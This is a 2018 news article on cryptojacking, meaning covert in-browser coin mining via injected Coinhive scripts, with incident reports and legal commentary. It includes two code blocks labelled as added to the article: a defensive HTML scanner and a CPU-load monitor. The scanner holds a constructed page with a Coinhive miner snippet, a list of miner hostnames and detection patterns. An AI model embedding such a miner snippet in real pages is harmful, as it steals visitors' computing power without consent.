
Cryptocurrencies give rise to a new kind of hacking threat

Breaking Code

Joe Mont | March 6, 2018

There are myriad concerns that go hand-in-hand with crypto-currencies, including fraud, money laundering, and the marketplace tensions still shaking out winners and laggards.

Add another growing concern to the list: system intruders who hijack your organization’s computing power in their quest to mine virtual coins. Experts are calling the practice “drive-by hacking” and “crypto-jacking.” The end-result could leave companies with crippled, slow, or damaged data systems.

The backbone of proof-of-work virtual currencies, Bitcoin being the best known, is a network of computers racing to solve deliberately hard cryptographic puzzles; the first to solve each one is rewarded for its time, effort, and computing power with newly minted coins. That alternative to the way central banks issue fiat currency is a primary appeal of crypto-currencies.

That central appeal is also causing headaches. “Miners”—those who run computers dedicated to processing the blockchain transactions that slowly build up the credits with which to obtain cryptocurrency units such as Bitcoins—have started to shift their operations off computer CPUs (central processing units), choosing instead to leverage far more powerful graphics processing units (GPUs). The resulting demand for GPUs has led to a global parts shortage that is vexing technology vendors and their supply chains.

It gets worse. Even the mightiest of GPUs is proving inefficient and under-powered for mining operations, forcing virtual currency hunters to take their cue from distributed computing and massive feats of inter-connected computing, such as the long-running SETI@Home (Search for Extraterrestrial Intelligence) Project, made possible by individually and voluntarily networked computers all powering the specific and common goal.

Volunteering in the new hacking landscape isn’t such a two-way street. Crypto-miners are meeting their power deficiency by sneaking short snippets of JavaScript onto corporate and other Websites. That code, inserted through a variety of traditional and creative hacking techniques, has the sole purpose of connecting the visitor’s browser to a mining service or pool and putting the visitor’s processor to work on coin mining. When a user visits the site, the script runs in the browser for as long as the page stays open and mines crypto-currency on the attacker’s behalf.

The stealth usurping of computing power can even affect mobile devices.

Data security software provider Kaspersky Lab predicts that Web miners could be among 2018’s most common cyber-threats. In 2017, the firm’s security solutions stopped the launch of Web miners on more than 70 million occasions, “and the use of such scripts is only set to rise,” it says.

The most common Web miner, and the one used in the vast majority of cases, is Coinhive. Rather than the well-known Bitcoin, these miners seek the stronger privacy protections and more anonymous transactions of upstarts such as Monero (the currency Coinhive mines) and Zcash, described by one expert as the “crypto-currency of choice for money laundering.” Monero’s mining algorithm was also designed to run efficiently on ordinary CPUs, which is what makes mining it from a browser tab viable at all.

Kaspersky adds that, from a user’s perspective, the illicit data mining “might look like a normal browser tab simply consuming a lot of resources.” But the “computer slows down and the fan whirs, and the next electricity bill is a shock,” it adds. “Web miners also work on smartphones and tablets, and that’s where they are a real threat: The increased load might cause the device to overheat and irreversibly damage some of its components.”

According to IBM Managed Security Services, crypto-currency mining attacks aimed at enterprise networks jumped six-fold between January and August. Its review of the industries targeted found manufacturing and financial services, at 29 percent each, tied as the industries experiencing the highest volume of these attacks. Other industries that have been targeted include arts and entertainment, information and communication technology, and retail.

Another research report, the Check Point “2017 Global Cyber Attack Trends Report,” notes that: “One of the most significant trends of the last few months which took the world by storm is the incredibly rapid rise of crypto-currency miners, especially the Web-based type.”

Crypto-mining malware is draining enterprises’ CPU power with an estimated 23 percent of organizations globally being affected by the Coinhive variant during January 2018, according to its latest Global Threat Impact index.

“Over the past three months, crypto-mining malware has steadily become an increasing threat to organizations, as criminals have found it to be a lucrative revenue stream,” says Maya Horowitz, manager of Check Point’s Threat Intelligence Group. “It is particularly challenging to protect against, as it is often hidden in Websites, enabling hackers to use unsuspecting victims to tap into the huge CPU resource that many enterprises have available. As such, it is critical that organizations have the solutions in place that protect against these stealthy cyber-attacks.”

“There are both quasi-legitimate and legitimate uses of this technology to monetize customers,” says Joshua Motta, founder and CEO of Coalition, billed as the first technology-enabled cyber-insurance solution. “It is obviously problematic if you don’t disclose you are doing it and do it without their consent. You are stealing their CPU resources for your own gain. There are Websites and publishers who are confirming it and getting consent to do so. I imagine there are people willing to do that, so it’s a fair trade.”

One such site is Salon. It gives visitors a pop-up window giving them two choices: disable all ad blocker extensions, or leave them running and let the site monetize your visit by using unused computing power. It uses Coinhive to mine Monero.

Other cases were far less transparent. Mining code was found hidden in the source of the Showtime Anytime Website, and on a publicly exposed Tesla server.

There are numerous ways attackers find their way into a site’s code, including phishing for the credentials of the people who maintain it. Another route is to have the in-browser mining code delivered by something the site already trusts, such as a third-party script, a browser extension, or an advertisement, so the site’s own files never need to be touched.

Motta says the approach is, in some ways, an evolution of ransomware techniques. WannaMine, a crypto-mining worm that spreads using the same EternalBlue exploit as the WannaCry ransomware, is one example.

“There is no such thing as a victimless crime,” he says. “They are effectively stealing your infrastructure. If your server were to be infected with one of these crypto-currency strains of malware it could consume so much of your CPU and memory resources that the computer is no longer functional for its core purpose. That’s clearly an area where the malware can cause a business impact, even if it may go unnoticed at a small scale.”

Noted security researcher Scott Helme was among those who uncovered that more than 4,000 Websites, including many U.K. government ones, had been loading a crypto-miner through a compromised third-party script that the sites had embedded. Among them was the U.K. National Health Service. Also on the list was the main Website of the U.S. court system.
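The injection paths described above (a miner script loaded directly from Coinhive, a miner started from an inline snippet, or a trusted third-party script that can be swapped for a miner) leave traces in a page's HTML that a site owner can check for. The following is an added example, not code from the article or from any vendor it quotes: a small heuristic scanner that parses a page's script tags, flags scripts served from Coinhive's real hostnames and inline code that calls the Coinhive API, and separately reports every third-party script loaded without a Subresource Integrity hash, since such a script is exactly what an attacker can replace. The page HTML, the hostnames `www.example.com` and `cdn.example-accessibility.net`, and the hash value are constructed for the demonstration.

```python
"""Heuristic scan of a page's HTML for in-browser crypto-mining indicators.

Added example, not from the article. The Coinhive hostnames and the
`new CoinHive.Anonymous(...)` API are real; the sample page below is constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hostnames that served the Coinhive miner (authedmine.com was its opt-in variant).
MINER_HOSTS = {"coinhive.com", "coin-hive.com", "authedmine.com"}

# Things a miner snippet does that ordinary page scripts rarely do.
INLINE_PATTERNS = {
    "coinhive_api": re.compile(r"new\s+CoinHive\.(Anonymous|User|Token)\s*\("),
    "throttle_opt": re.compile(r"throttle\s*:\s*0?\.\d+"),      # miners throttle to stay unnoticed
    "wss_proxy": re.compile(r"wss?://[^\"']+/proxy", re.I),      # pool proxy over WebSocket
}


class _ScriptCollector(HTMLParser):
    """Collect external script sources (with SRI flag) and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []   # (src, has_integrity_attribute)
        self.inline = []     # inline script bodies
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append((a["src"], "integrity" in a))
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def scan_html(html, page_host):
    """Return a list of (finding, evidence) tuples for one page's HTML."""
    p = _ScriptCollector()
    p.feed(html)
    p.close()
    findings = []
    for src, has_sri in p.external:
        host = urlparse(src if "//" in src else "//" + src).hostname or ""
        if not host or host == page_host:
            continue  # first-party script: out of scope for this check
        if host in MINER_HOSTS or any(host.endswith("." + h) for h in MINER_HOSTS):
            findings.append(("miner_script_host", src))
        elif not has_sri:
            # A third-party script with no integrity hash can be replaced upstream,
            # which is how a miner ended up on thousands of sites at once.
            findings.append(("third_party_without_sri", src))
    for body in p.inline:
        for name, rx in INLINE_PATTERNS.items():
            if rx.search(body):
                findings.append((name, body.strip()[:60]))
    return findings


# Constructed sample page: one third-party widget with no SRI, one with SRI,
# and a Coinhive snippet of the shape the miner's documentation used.
SAMPLE_PAGE = """
<html><head>
<script src="/js/app.js"></script>
<script src="https://cdn.example-accessibility.net/widget.js"></script>
<script src="https://cdn.example-accessibility.net/pinned.js"
        integrity="sha384-CONSTRUCTED_PLACEHOLDER_HASH" crossorigin="anonymous"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITE_KEY_REDACTED', {throttle: 0.3});
  miner.start();
</script>
</head><body>news</body></html>
"""

if __name__ == "__main__":
    for finding, evidence in scan_html(SAMPLE_PAGE, "www.example.com"):
        print(f"{finding:26} {evidence}")
```

The scanner is a triage aid, not a blocklist: Coinhive's script was routinely copied to other hosts and obfuscated, so the absence of findings proves nothing, while the `third_party_without_sri` finding is actionable regardless of whether a miner is present today.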

“Companies are already spending so much money on data security services,” says Stephen Kong, a shareholder at the law firm Stradling and chair of its Technology Transactions practice group. “It is another one of those things where each company has to go with their security vendors and have a conversation with them. It is always going to be a game of Whac-A-Mole. The security services companies are always trying to determine what are the latest viruses and other malicious code that get put in, and the party behind the behavior always trying to hide it.”

Crypto-mining, Kong says, “is particularly tough, because it falls into a bit of a gray area. It is definitely invasive to the affected companies, and it causes harm because they have to use more electricity while losing processing power. The reason why it is a gray area, however, and also a bit of a legal conundrum, is that unlike other viruses and hacks, it doesn’t cost companies in terms of lost data or money.”

Most laws are set up to place liability upon companies if they expose customer data to outsiders. “Here, for the most part so far, all these outsiders want is access to processing power,” Kong says. “That causes harm, but not the direct harm that loss of data does.”

His advice, beyond specifically addressing the issue with security vendors, is to continually monitor power consumption and processor and memory load.

“If you see a drop, you may have to suspect that there is some sort of hacker or virus that’s draining your processing power,” Kong says.
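The monitoring Kong recommends only pays off if the rule separates a miner's signature, which is flat-out processor use for as long as it runs, from the bursty load of legitimate work. The following is an added example, not code from the article or from any vendor it quotes: a detector that takes per-process CPU samples of the kind any endpoint agent or `ps` loop produces and flags processes whose utilisation stays above a threshold for a minimum run of consecutive samples. The samples, host names and process names are constructed, and the threshold and run length are illustrative starting points rather than recommended values.

```python
"""Flag sustained processor load of the kind an in-browser or server-side miner produces.

Added example, not from the article. Input is constructed per-process CPU samples
as (timestamp, host, process, cpu_percent). A process is suspicious when its CPU
stays at or above `threshold` for at least `min_consecutive` samples in a row;
a single spike, however high, is not enough.
"""
from collections import defaultdict


def sustained_high_cpu(samples, threshold=80.0, min_consecutive=3):
    """Return {(host, process): longest_run} for processes that breached the rule."""
    by_key = defaultdict(list)
    for _ts, host, proc, cpu in sorted(samples):       # sort so runs follow time order
        by_key[(host, proc)].append(cpu)
    alerts = {}
    for key, series in by_key.items():
        run = best = 0
        for cpu in series:
            run = run + 1 if cpu >= threshold else 0  # a low sample resets the run
            best = max(best, run)
        if best >= min_consecutive:
            alerts[key] = best
    return alerts


# Constructed samples, one per minute. nginx is busy but bursty; node is a
# server-side miner running flat out; chrome on a workstation spikes while a
# page carrying a browser miner is open, then settles when the tab is closed.
SAMPLES = [
    (1, "web01", "nginx", 95.0), (2, "web01", "nginx", 20.0), (3, "web01", "nginx", 90.0),
    (4, "web01", "nginx", 15.0), (5, "web01", "nginx", 85.0), (6, "web01", "nginx", 10.0),
    (1, "web01", "node", 97.0), (2, "web01", "node", 98.0), (3, "web01", "node", 99.0),
    (4, "web01", "node", 97.0), (5, "web01", "node", 98.0), (6, "web01", "node", 99.0),
    (1, "ws14", "chrome", 30.0), (2, "ws14", "chrome", 95.0), (3, "ws14", "chrome", 96.0),
    (4, "ws14", "chrome", 97.0), (5, "ws14", "chrome", 94.0), (6, "ws14", "chrome", 35.0),
]

if __name__ == "__main__":
    for (host, proc), run in sorted(sustained_high_cpu(SAMPLES).items()):
        print(f"{host}/{proc}: {run} consecutive samples at or above threshold")
```

Tuning is the whole game here: too short a run flags every build job and video call, while a miner throttled to 30 percent, as Coinhive allowed, slips under an 80 percent threshold entirely, so the rule is best paired with the electricity and fan-noise symptoms the article describes rather than relied on alone.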

If a crypto-miner is discovered, a unique (yet unproven) legal tactic goes back to the turn of the millennium, when third-party companies tried to “scrape” and repackage eBay data. “eBay was able to make successful legal claims based on trespass,” Kong says. “I wonder now if we are going to see a return to those legal claims. When you steal somebody’s processing power, how is that any different than stealing any other property?”

The example he gave was eBay v. Bidder’s Edge, filed in 1999. Bidder’s Edge, an aggregator of auction listings, accessed eBay more than 100,000 times a day, nearly 2 percent of the site’s entire daily traffic. eBay used a “trespass to chattels” claim to win an injunction against the aggregation. The term refers to interfering with another party’s movable personal property.

“When these companies come in and try to scrape my data and servers, it is causing slowdowns in my system and costing me more to process data,” Kong says, explaining how the strategy could be deployed.
